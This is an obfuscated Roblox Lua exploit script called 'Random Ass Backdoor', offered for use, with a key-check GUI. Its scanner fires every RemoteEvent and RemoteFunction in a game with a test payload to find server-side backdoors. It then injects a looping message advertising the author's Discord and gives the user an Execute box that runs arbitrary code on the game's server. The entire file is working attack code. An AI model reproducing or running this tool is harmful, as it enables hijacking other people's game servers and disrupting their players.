--[[
______                _                    ___           ______            _       _                  
| ___ \              | |                  / _ \          | ___ \          | |     | |                 
| |_/ /__ _ _ __   __| | ___  _ __ ___   / /_\ \___ ___  | |_/ / __ _  ___| | ____| | ___   ___  _ __ 
|    // _` | '_ \ / _` |/ _ \| '_ ` _ \  |  _  / __/ __| | ___ \/ _` |/ __| |/ / _` |/ _ \ / _ \| '__|
| |\ \ (_| | | | | (_| | (_) | | | | | | | | | \__ \__ \ | |_/ / (_| | (__|   < (_| | (_) | (_) | |   
\_| \_\__,_|_| |_|\__,_|\___/|_| |_| |_| \_| |_/___/___/ \____/ \__,_|\___|_|\_\__,_|\___/ \___/|_|
              Random Ass Backdoor (Version 2) - By exvy
]]--

local v0=game:GetService("Players");local v1=v0.LocalPlayer;local v2=v1:WaitForChild("PlayerGui");local v3={"leakingdontwork?","HttpService"};local function v4(v10) for v129,v130 in ipairs(v3) do if (v10==v130) then return true;end end return false;end local function v5() if  not isfolder("KeySystem") then makefolder("KeySystem");end end local function v6(v11) if  not v4(v11) then return false;end v5();local v12,v13=pcall(function() writefile("KeySystem/key.txt",v11);end);if  not v12 then warn("save error: "   .. v13 );return false;end return true;end local function v7() v5();if  not isfile("KeySystem/key.txt") then return nil;end local v14,v15=pcall(function() return readfile("KeySystem/key.txt");end);if v14 then return v15;end return nil;end local function v8() local v16=Instance.new("ScreenGui");v16.Name="BackdoorGUI";v16.ResetOnSpawn=false;v16.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v16.Parent=v2;local v22=Instance.new("Frame");v22.Parent=v16;v22.BackgroundColor3=Color3.fromRGB(0,0,0);v22.BorderColor3=Color3.fromRGB(0,0,0);v22.BorderSizePixel=0;v22.Position=UDim2.new(0.248322144,0,0.35603112,0);v22.Size=UDim2.new(0,305,0,185);v22.Active=true;v22.Draggable=true;local v31=Instance.new("UICorner");v31.CornerRadius=UDim.new(0,3);v31.Parent=v22;local v34=Instance.new("TextLabel");v34.Parent=v22;v34.BackgroundColor3=Color3.fromRGB(255,255,255);v34.BackgroundTransparency=1;v34.BorderColor3=Color3.fromRGB(0,0,0);v34.BorderSizePixel=0;v34.Position=UDim2.new(0.144262299,0,0,0);v34.Size=UDim2.new(0,252,0,50);v34.Font=Enum.Font.SourceSans;v34.Text="Random Ass Backdoor";v34.TextColor3=Color3.fromRGB(255,255,255);v34.TextSize=25;v34.TextXAlignment=Enum.TextXAlignment.Left;local v49=Instance.new("ImageLabel");v49.Parent=v22;v49.BackgroundColor3=Color3.fromRGB(255,255,255);v49.BackgroundTransparency=1;v49.BorderColor3=Color3.fromRGB(0,0,0);v49.BorderSizePixel=0;v49.Size=UDim2.new(0,50,0,50);v49.Image="rbxasset://textures/ui/GuiImagePlaceholder.png";local v57=Instance.new("TextBox");v57.Parent=v22;v57.BackgroundColor3=Color3.fromRGB(44,44,44);v57.BackgroundTransparency=0.5;v57.BorderColor3=Color3.fromRGB(0,0,0);v57.BorderSizePixel=0;v57.Position=UDim2.new(0.321311474,0,0.270270258,0);v57.Size=UDim2.new(0,198,0,124);v57.Font=Enum.Font.SourceSans;v57.Text="Discord: envysplague";v57.TextColor3=Color3.fromRGB(0,0,0);v57.TextSize=14;v57.TextXAlignment=Enum.TextXAlignment.Left;v57.TextYAlignment=Enum.TextYAlignment.Top;local v72=Instance.new("TextButton");v72.Parent=v22;v72.BackgroundColor3=Color3.fromRGB(44,44,44);v72.BorderColor3=Color3.fromRGB(0,0,0);v72.BorderSizePixel=0;v72.Position=UDim2.new(0.0262295082,0,0.74594593,0);v72.Size=UDim2.new(0,75,0,36);v72.Font=Enum.Font.SourceSans;v72.Text="Execute";v72.TextColor3=Color3.fromRGB(0,0,0);v72.TextSize=20;local v83=Instance.new("TextButton");v83.Parent=v22;v83.BackgroundColor3=Color3.fromRGB(44,44,44);v83.BorderColor3=Color3.fromRGB(0,0,0);v83.BorderSizePixel=0;v83.Position=UDim2.new(0.0262295082,0,0.270270258,0);v83.Size=UDim2.new(0,75,0,36);v83.Font=Enum.Font.SourceSans;v83.Text="Clear";v83.TextColor3=Color3.fromRGB(0,0,0);v83.TextSize=20;local v94=Instance.new("TextButton");v94.Parent=v22;v94.BackgroundColor3=Color3.fromRGB(44,44,44);v94.BorderColor3=Color3.fromRGB(0,0,0);v94.BorderSizePixel=0;v94.Position=UDim2.new(0.0262295082,0,0.508108079,0);v94.Size=UDim2.new(0,75,0,36);v94.Font=Enum.Font.SourceSans;v94.Text="Inject";v94.TextColor3=Color3.fromRGB(0,0,0);v94.TextSize=20;local v105=Instance.new("TextButton");v105.Parent=v22;v105.BackgroundColor3=Color3.fromRGB(255,255,255);v105.BackgroundTransparency=1;v105.BorderColor3=Color3.fromRGB(0,0,0);v105.BorderSizePixel=0;v105.Position=UDim2.new(0.885245919,0,0,0);v105.Size=UDim2.new(0,35,0,35);v105.Font=Enum.Font.SourceSans;v105.Text="x";v105.TextColor3=Color3.fromRGB(255,0,0);v105.TextSize=30;v105.TextYAlignment=Enum.TextYAlignment.Top;local function v118() local v131=Instance.new("LocalScript",v22);local v132=v131.Parent;local v133=game:GetService("UserInputService");local v134=false;local v135;local v136;local v137;local function v138(v236) local v237=v236.Position-v136 ;v132.Position=UDim2.new(v137.X.Scale,v137.X.Offset + v237.X ,v137.Y.Scale,v137.Y.Offset + v237.Y );end v132.InputBegan:Connect(function(v239) if ((v239.UserInputType==Enum.UserInputType.MouseButton1) or (v239.UserInputType==Enum.UserInputType.Touch)) then v134=true;v136=v239.Position;v137=v132.Position;v239.Changed:Connect(function() if (v239.UserInputState==Enum.UserInputState.End) then v134=false;end end);end end);v132.InputChanged:Connect(function(v240) if ((v240.UserInputType==Enum.UserInputType.MouseMovement) or (v240.UserInputType==Enum.UserInputType.Touch)) then v135=v240;end end);v133.InputChanged:Connect(function(v241) if ((v241==v135) and v134) then v138(v241);end end);end coroutine.wrap(v118)();local function v119() local v139=Instance.new("LocalScript",v34);local v140=v139.Parent;local v141=0;while true do v141=v141 + 0.01 ;if (v141>1) then v141=0;end v140.TextColor3=Color3.fromHSV(v141,1,1);task.wait(0.03);end end coroutine.wrap(v119)();local function v120() local v142=Instance.new("LocalScript",v49);local v143=game:GetService("Players");local v144=v143.LocalPlayer;local v145=v142.Parent;if (v145 and v144) then local v292=v144.UserId;local v293="https://www.roblox.com/avatar-thumbnail/image?userId="   .. v292   .. "&width=420&height=420&format=png&type=bust" ;v145.Image=v293;end end coroutine.wrap(v120)();local function v121() local v146=Instance.new("LocalScript",v57);local v147=v146.Parent;local v148=0;while true do v148=v148 + 0.01 ;if (v148>1) then v148=0;end v147.TextColor3=Color3.fromHSV(v148,1,1);task.wait(0.03);end end coroutine.wrap(v121)();local function v122() local v149=Instance.new("LocalScript",v57);local v150=v149.Parent;local v151=game:GetService("UserInputService");v150.TextWrapped=true;v150.MultiLine=true;local v154;local function v155(v244,v245) if ((v244.UserInputType==Enum.UserInputType.Keyboard) and (v244.KeyCode==Enum.KeyCode.Return)) then v150:ReleaseFocus();end end v150.Focused:Connect(function() v154=v151.InputBegan:Connect(v155);end);v150.FocusLost:Connect(function() if v154 then v154:Disconnect();v154=nil;end end);end coroutine.wrap(v122)();local function v123() local v156=Instance.new("LocalScript",v72);local v157=v156.Parent;local v158=0;while true do v158=v158 + 0.01 ;if (v158>1) then v158=0;end v157.TextColor3=Color3.fromHSV(v158,1,1);task.wait(0.03);end end coroutine.wrap(v123)();local function v124() local v159=Instance.new("LocalScript",v83);local v160=v159.Parent;local v161=0;while true do v161=v161 + 0.01 ;if (v161>1) then v161=0;end v160.TextColor3=Color3.fromHSV(v161,1,1);task.wait(0.03);end end coroutine.wrap(v124)();local function v125() local v162=Instance.new("LocalScript",v94);local v163=v162.Parent;local v164=0;while true do v164=v164 + 0.01 ;if (v164>1) then v164=0;end v163.TextColor3=Color3.fromHSV(v164,1,1);task.wait(0.03);end end coroutine.wrap(v125)();local function v126() local v165=Instance.new("LocalScript",v105);v165.Parent.MouseButton1Click:Connect(function() v165.Parent.Parent.Visible=false;end);end coroutine.wrap(v126)();local function v127() local v166=Instance.new("LocalScript",v22);local v167=v166.Parent.Parent;v167.ResetOnSpawn=false;end coroutine.wrap(v127)();local function v128() local v169={"a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"};local v170=nil;local v171=game:GetService("HttpService");local v172=false;local function v173(v250,v251) local v252=print;if (v251==1) then v252=print;end if (v251==2) then v252=error;end if (v251==3) then v252=warn;end v252("Backdoor Scanner: "   .. v250 );end local function v174(v253) game:GetService("StarterGui"):SetCore("SendNotification",{Title="Backdoor Scanner",Duration=6,Text=v253});end local function v175(v254,v255) if v254:IsA("RemoteEvent") then v254:FireServer(v255);elseif v254:IsA("RemoteFunction") then spawn(function() v254:InvokeServer(v255);end);end end local function v176(v256) local v257="";for v295=1,v256 do v257=v257   .. v169[math.random(1, #v169)] ;end return v257;end local function v177() local v258=os.clock();local v259={};local v260;local v261=game:GetService("ReplicatedStorage"):FindFirstChild("lh"   .. ((game.PlaceId/6666) * 1337 * game.PlaceId) );if (v261 and v261:IsA("RemoteFunction")) then while true do v260=v176(math.random(12,30));if  not v259[v260] then break;end end spawn(function() v261:InvokeServer("backdoor scanner","a=Instance.new('Model',workspace)a.Name='"   .. v260   .. "'" );end);v259[v260]=v261;end for v296,v297 in game:GetDescendants() do if  not (v297:IsA("RemoteEvent") or v297:IsA("RemoteFunction")) then continue;end if (string.split(v297:GetFullName(),".")[1]=="RobloxReplicatedStorage") then v173("Roblox Replicated Storage ("   .. v297.Name   .. ")" ,1);continue;end if ((v297.Parent==game:GetService("ReplicatedStorage")) or (v297.Parent.Parent==game:GetService("ReplicatedStorage")) or (v297.Parent.Parent.Parent==game:GetService("ReplicatedStorage"))) then if (v297:FindFirstChild("__FUNCTION") or (v297.Name=="__FUNCTION")) then v173("Adonis filter detected ("   .. v297.Name   .. ")" ,1);continue;end if ((v297.Parent.Parent.Name=="HDAdminClient") and (v297.Parent.Name=="Signals")) then v173("HD Admin ("   .. v297.Name   .. ")" ,1);continue;end if (v297.Parent.Name=="DefaultChatSystemChatEvents") then v173("Chat event ("   .. v297.Name   .. ")" ,1);continue;end end while true do v260=v176(math.random(12,30));if  not v259[v260] then break;end end v175(v297,"a=Instance.new('Model',workspace)a.Name='"   .. v260   .. "'" );v259[v260]=v297;v173('Tested remote "'   .. v297:GetFullName()   .. '"' ,1);end for v299=1,100 do for v314,v315 in pairs(v259) do if workspace:FindFirstChild(v314) then v174("Backdoor found! "   .. (os.clock() -v258)   .. "s" );v170=v315;v173(v315:GetFullName(),3);v175(v315,"a=Instance.new('Hint')a.Text='Discord: envysplague, Discord.gg/kd9ET5B3TF'while true do a.Parent=workspace;wait(15)a:Remove()wait(30)end");return true;end end wait(0.1);end return false;end v72.MouseButton1Click:Connect(function() local v262=v57.Text;if v170 then v175(v170,v262);v72.Text="Executed!";task.wait(0.5);v72.Text="Execute";else v174("No backdoor found yet!");end end);v83.MouseButton1Click:Connect(function() v57.Text="";v83.Text="Cleared!";task.wait(0.5);v83.Text="Clear";end);v94.MouseButton1Click:Connect(function() if  not v172 then v172=true;v173("Scanning for backdoors...",3);v94.Text="Scanning...";if  not v177() then v94.Text="Failure";v172=false;else v94.Text="Injected";v172=false;end end end);game:GetService("UserInputService").InputBegan:Connect(function(v265,v266) if ((v265.KeyCode==Enum.KeyCode.LeftAlt) and  not v266) then v22.Visible= not v22.Visible;end end);end v128();end local v9=v7();if (v9 and v4(v9)) then v8();else local v178=Instance.new("ScreenGui");v178.Name="KeySystem";v178.Parent=v2;local v181=Instance.new("Frame");local v182=Instance.new("TextButton");local v183=Instance.new("TextBox");local v184=Instance.new("TextLabel");v181.Parent=v178;v181.BackgroundColor3=Color3.fromRGB(0,0,0);v181.BorderColor3=Color3.fromRGB(0,0,0);v181.BorderSizePixel=0;v181.Position=UDim2.new(0.14337568,0,0.190661475,0);v181.Size=UDim2.new(0,169,0,165);v181.Active=true;v181.Draggable=true;v182.Parent=v181;v182.BackgroundColor3=Color3.fromRGB(44,44,44);v182.BorderColor3=Color3.fromRGB(0,0,0);v182.BorderSizePixel=0;v182.Position=UDim2.new(0.0662294626,0,0.787391424,0);v182.Size=UDim2.new(0,147,0,28);v182.Font=Enum.Font.SourceSans;v182.Text="Check";v182.TextColor3=Color3.fromRGB(0,0,0);v182.TextSize=20;v183.Parent=v181;v183.BackgroundColor3=Color3.fromRGB(44,44,44);v183.BackgroundTransparency=0.5;v183.BorderColor3=Color3.fromRGB(0,0,0);v183.BorderSizePixel=0;v183.Position=UDim2.new(0.0662294552,0,0.206060603,0);v183.Size=UDim2.new(0,147,0,86);v183.Font=Enum.Font.SourceSans;v183.Text="";v183.TextColor3=Color3.fromRGB(0,0,0);v183.TextSize=14;v183.TextXAlignment=Enum.TextXAlignment.Left;v183.TextYAlignment=Enum.TextYAlignment.Top;v184.Parent=v181;v184.BackgroundColor3=Color3.fromRGB(255,255,255);v184.BackgroundTransparency=1;v184.BorderColor3=Color3.fromRGB(0,0,0);v184.BorderSizePixel=0;v184.Position=UDim2.new(0.0613114387,0,0,0);v184.Size=UDim2.new(0,148,0,35);v184.Font=Enum.Font.SourceSans;v184.Text="Key System";v184.TextColor3=Color3.fromRGB(255,255,255);v184.TextSize=25;v184.TextXAlignment=Enum.TextXAlignment.Left;local function v231() local v267=Instance.new("LocalScript",v182);local v268=v267.Parent;local v269=0;while true do v269=v269 + 0.01 ;if (v269>1) then v269=0;end v268.TextColor3=Color3.fromHSV(v269,1,1);task.wait(0.03);end end coroutine.wrap(v231)();local function v232() local v270=Instance.new("LocalScript",v183);local v271=v270.Parent;local v272=0;while true do v272=v272 + 0.01 ;if (v272>1) then v272=0;end v271.TextColor3=Color3.fromHSV(v272,1,1);task.wait(0.03);end end coroutine.wrap(v232)();local function v233() local v273=Instance.new("LocalScript",v183);local v274=v273.Parent;local v275=game:GetService("UserInputService");v274.TextWrapped=true;v274.MultiLine=true;local v278;local function v279(v302,v303) if ((v302.UserInputType==Enum.UserInputType.Keyboard) and (v302.KeyCode==Enum.KeyCode.Return)) then v274:ReleaseFocus();end end v274.Focused:Connect(function() v278=v275.InputBegan:Connect(v279);end);v274.FocusLost:Connect(function() if v278 then v278:Disconnect();v278=nil;end end);end coroutine.wrap(v233)();local function v234() local v280=Instance.new("LocalScript",v184);local v281=v280.Parent;local v282=0;while true do v282=v282 + 0.01 ;if (v282>1) then v282=0;end v281.TextColor3=Color3.fromHSV(v282,1,1);task.wait(0.03);end end coroutine.wrap(v234)();local function v235() local v283=Instance.new("LocalScript",v181);local v284=v283.Parent;local v285=game:GetService("UserInputService");local v286=false;local v287;local v288;local v289;local function v290(v305) local v306=v305.Position-v288 ;v284.Position=UDim2.new(v289.X.Scale,v289.X.Offset + v306.X ,v289.Y.Scale,v289.Y.Offset + v306.Y );end v284.InputBegan:Connect(function(v308) if ((v308.UserInputType==Enum.UserInputType.MouseButton1) or (v308.UserInputType==Enum.UserInputType.Touch)) then v286=true;v288=v308.Position;v289=v284.Position;v308.Changed:Connect(function() if (v308.UserInputState==Enum.UserInputState.End) then v286=false;end end);end end);v284.InputChanged:Connect(function(v309) if ((v309.UserInputType==Enum.UserInputType.MouseMovement) or (v309.UserInputType==Enum.UserInputType.Touch)) then v287=v309;end end);v285.InputChanged:Connect(function(v310) if ((v310==v287) and v286) then v290(v310);end end);end coroutine.wrap(v235)();v182.MouseButton1Click:Connect(function() local v291=v183.Text:gsub("%s+","");if (v291=="") then v183.Text="please enter a key";task.wait(1.5);v183.Text="";return;end if v4(v291) then if v6(v291) then v183.Text="key accepted!";v183.TextColor3=Color3.fromRGB(0,255,0);task.wait(1.5);v178:Destroy();v8();end else v183.Text="invalid key";v183.TextColor3=Color3.fromRGB(255,0,0);task.wait(1.5);v183.Text="";v183.TextColor3=Color3.fromRGB(0,0,0);end end);end
